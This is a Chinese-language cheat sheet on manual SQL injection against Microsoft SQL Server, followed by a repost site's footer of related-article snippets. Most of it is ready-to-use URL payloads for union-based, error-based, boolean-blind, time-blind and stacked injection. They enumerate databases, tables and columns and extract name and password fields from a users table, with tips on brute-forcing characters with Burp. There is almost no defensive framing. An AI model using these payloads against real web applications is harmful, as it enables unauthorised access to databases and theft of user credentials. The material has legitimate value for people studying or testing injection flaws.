mssql手工注入简单总结

0x01 基础知识

  • master数据库

master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行中的过程的信息。

  • sysdatabases表

该表保存在master数据库中,这个表中保存的是所有的库名,以及库的ID,和一些相关信息。(一般用来查询全部的数据库,master..sysdatabases)。

  • sysobjects表

mssql的每个数据库内都有此系统表,存放该数据库内所有表数据;

关键字段name,id,xtype;

xtype='u'时,表示为用户建立的表。(一般用来查数据库用户自建表)

  • syscolumns表

mssql的每个数据库内都有此系统表,存放所有表的字段;

关键字段name,id;

通过确定id来确定字段在哪张表中。

  • information_schema数据库

该表是在SQL server2000及更高版本存在的,可以检索数据库中的对象的元数据,与MySQL中的有相同的功能,它是符合ISO标准的;

该数据库只记录每个自建库的数据,每个自建库对应一个information_schema

该数据库不会出现在系统数据库中,也就是只能查自建库表数据,列数据;

infomation_schema.tables的关键字段:table_catalog(数据库名)、table_name(表名)

information_schema.columns的关键字段:table_catalog(数据库名)、table_name(表名)、column_name(列名)、data_type(数据类型)


  • 常见内置函数
select host_name();
select currnet_user;
select db_name();				#返回当前数据库名
select @@version;
select subString('admin',1,1);
select char(97);
select ascii('a');
select count(*);				#返回查询的行数
select len('adb');
select isnull(db_name(),0);		# 判断查询是否带有NULL,有则替换
select cast(db_name() as int);  # CAST(a as type) 类型转换,转换失败会报错
select object_id('cms_admin');  # 根据表名返回数据库表名ID
select object_name(199305139);  # 根据ID返回数据库表名
select @@version for xml path;  # 将查询到的数据以xml形式返回(相当于mysql的group_concat()聚合)
if (1=1) waitfor delay '0:0:2'  # 时间盲注语句,延迟2秒,if前不需要and

0x02 联合查询注入

使用类似于limit操作的top

查当前数据库

?id=1 union select 1,'2',(select db_name()),4

查当前数据库的表数量

?id=1 union select 1,'2','3',(select count(name) from sysobjects where xtype='u')

查当前数据库的表(可bp爆破)修改后面的top值

?id=1 union select 1,'2',(select top 1 name from sysobjects where xtype='u' and name not in (select top 0 name from sysobjects  where xtype='u')),4

查看当前数据库某表的列数量

?id=1 union select 1,'2','3',(select count(*) from syscolumns where id=object_id('ptest'))

查看当前数据库某表的列名

?id=1 union select 1,'2',(select top 1 name from syscolumns where id=object_id('ptest') and name not in (select top 0 name from syscolumns where id=object_id('ptest'))),4

查看当前数据库下某表有多少行

?id=1 union select 1,'2','3',(select  count(*) from ptest)

查看当前数据库下某表的值

?id=4 union select 1,'2',(select top 1 cmd from ptest),4

注意

可以使用类似mysql的group_concat()进行聚合:xml for path

该语句会返回一张xml

?id=1 union select 1,'2',(select name,',' from sysobjects where xtype='u' for xml path),4

0x03 报错盲注

利用弱类型进行报错

测试

?id=1+and+1='asd'

查询所有数据库

?id=1+and+1=(select+name+from+master..sysdatabases+for+xml+path)

查询某个数据库的表

?id=1+and+1=(select+name+from+test..sysobjects+where+xtype='u'+for+xml+path)

查询test数据库的users表的字段

?id=1+and+1=(select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path)

查询users表的数据

?id=1+and+1=(select+id,name,password,age+from+test..users+for+xml+path)

0x04 布尔盲注

测试

?id=1+and+1=1

查询当前数据库名长度

?id=1+and+len((select+db_name()))=10

查询当前数据库名(可手工,可放入bp爆破)

?id=1+and+substring((select+db_name()),1,1)=char(10)

查询当前数据库test下的所有表长度(可手工,可放入bp爆破)

?id=1+and+len((select+name+from+test..sysobjects+for+xml+path))=10

查询当前数据库test的表(可手工,可放入bp爆破)

?id=1+and+substring((select+name+from+test..sysobjects+for+xml+path),1,1)=char(10)

查询test数据库下的users表字段长度(可手工,可放入bp爆破)

?id=1+and+len((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path))=10

查询test数据库下的users表字段(可手工,可放入bp爆破)

?id=1+and+substring((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path),1,1)=char(10)

查询users表数据长度(可手工,可放入bp爆破)

?id=1+and+len((select+id,name,password,age+from+test..users+for+xml+path))=1

查询user表数据(可手工,可放入bp爆破)

?id=1+and+substring((select+id,name,password,age+from+test..users+for+xml+path),1,1)=char(1)

0x05 时间盲注

使用 if () waitfor delay '0:0:2'

测试

?id=1+if(1=1)+waitfor+delay+'0:0:2'

查询当前数据库名长度

?id=1+if(len((select+db_name()))=10)+waitfor+delay+'0:0:2'

查询当前数据库名(可手工,可放入bp爆破)

?id=1+if(substring((select+db_name()),1,1)=char(10))+waitfor+delay+'0:0:2'

查询当前数据库test下的所有表长度(可手工,可放入bp爆破)

?id=1+if(len((select+name+from+test..sysobjects+where+xtype='u'+for+xml+path))=10)+waitfor+delay+'0:0:2' 

查询当前数据库test的表(可手工,可放入bp爆破)

?id=1+if(substring((select+name+from+test..sysobjects+where+xtype='u'+for+xml+path),1,1)=char(10))+waitfor+delay+'0:0:2'

查询test数据库下的users表字段长度(可手工,可放入bp爆破)

?id=1+if(len((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path))=10)+waitfor+delay+'0:0:2'

查询test数据库下的users表字段(可手工,可放入bp爆破)

?id=1+if(substring((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path),1,1)=char(10))+waitfor+delay+'0:0:2'

查询users表数据长度(可手工,可放入bp爆破)

?id=1+if(len((select+id,name,password,age+from+test..users+for+xml+path))=1)+waitfor+delay+'0:0:2'

查询user表数据(可手工,可放入bp爆破)

?id=1+if(substring((select+id,name,password,age+from+test..users+for+xml+path),1,1)=char(1))+waitfor+delay+'0:0:2'

0x06 堆叠注入

测试时关键条件的看函数是否能执行多条sql语句

测试

?id=1;if(1=1)+waitfor+delay+'0:0:2'

0xFF 注意

  • 如果查其他库,可能会因为当前用户权限不够,导致无法查询。

原文地址:https://www.cnblogs.com/jarwu/p/15205779.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


本篇内容主要讲解“sqlalchemy的常用数据类型怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“sqlalche...
今天小编给大家分享一下sqlServer实现分页查询的方式有哪些的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家
这篇文章主要介绍“sqlmap之osshell怎么使用”,在日常操作中,相信很多人在sqlmap之osshell怎么使用问题上存在疑惑,小编查阅了各式资料,整理出
本篇内容介绍了“SQL注入的知识点有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧...
1. mssql权限sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限db权限:文件管理,数据库操作等 users-administratorspublic权限:数据库操作 guest-users2、sql server注入执行命令查
sql执行计划如何查看?在SPL庞大的数据中我们不知道如何查看实际数据库中发生了什么事情,有必要定期进行查询优化和索引否则会影响我们后期的SQL的查询速度。那么针对这样的问题我们必须要知道SQL执行的计划,在本文中winwin7小编给大家分享下SQL执
SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点应用非常广泛。不过在使用中,我们会遇到非常多的错误,面对这么庞大的数据库环境,当然会有精确的错误代码的对照季,下面小编分享的
SQL Server本地账户无法登陆出现错误提示:error:40-Could not open a connenction to SQL Server的问题很常见,对于初学者来说可能不知道如何解决,一起来看看下面的解决方案。解决步骤如下:1、这种情况需要开启 SQL Server service
微软推出的SQL2008是一款非常好用的数据库软件,它稳定、功能强大,为众多企业提供了最佳的数据库解决方案,那么我们如何在Windows中安装它呢,一些朋友对SQL Server 2008的安装过程还不是很熟悉,下面就一起来看看SQL Server 2008详细安装图解...
本页概要如果您使用的是 SQL Server 2005备份和还原Sp_detach_db 和 Sp_attach_db 存储过程关于排序规则的说明导入和导出数据(在 SQL Server 数据库之间复
DBCC CHECKIDENT 检查指定表的当前标识值,如有必要,还对标识值进行更正。 语法 DBCC CHECKIDENT ( 'table_name' [ , { NORESEED
这里对 SQL Server 字符串函数进行分门别类地列出,便于查阅和记忆,相信大家都在其它方面有高深的编程基础,从字面上来说大家都知道这些函数的意义,就不对这些函数作过多的解释了,主要谈些经验,具体
查询及删除重复记录的方法 1、查找表(people)中多余的重复记录,重复记录是根据单个字段(peopleId)来判断select*frompeoplewherepeopleIdin(selectpe
微软发SQL Server 2008第二个CTP预览版from: http://news.csdn.net/n/20070807/107158.html8月7日消息,微软公司本周发布了SQL Serv
症状当您将数据库备份恢复到另一台服务器时,可能会遇到孤立用户的问题。SQL Server 联机丛书中的孤立用户疑难解答主题中没有讲述解决此问题的具体步骤。本文介绍了如何解决孤立用户问题。更多信息虽然术
当登录SQL Server 2005时可能碰到错误: 'No Process is on the Other End of the Pipe'。解决方法:(1)Open up SQL
概要本文描述如何映射标准登录和集成登录来解决在运行 SQL Server 的服务器之间移动数据库时的权限问题。更多信息当您将数据库从一个运行 SQL Server 的服务器移到另一个运行 SQL Se
----------------------------------------问题:该用户与可信的SQL SERVER 连接无关联使用sa用户或自建用户使用“SQL SERVER 身份认证”连接数据
更新日期: 2007 年 5 月 20 日 使用下表可以确定各种版本的 Microsoft SQL Server 2005 支持哪些功能。有关 SQL Server 2005 Enterprise E
当从Excel导入数据到Sql Sever中,可能会出现以下问题:
对于指定的缓冲区大小而言,源列的数据太大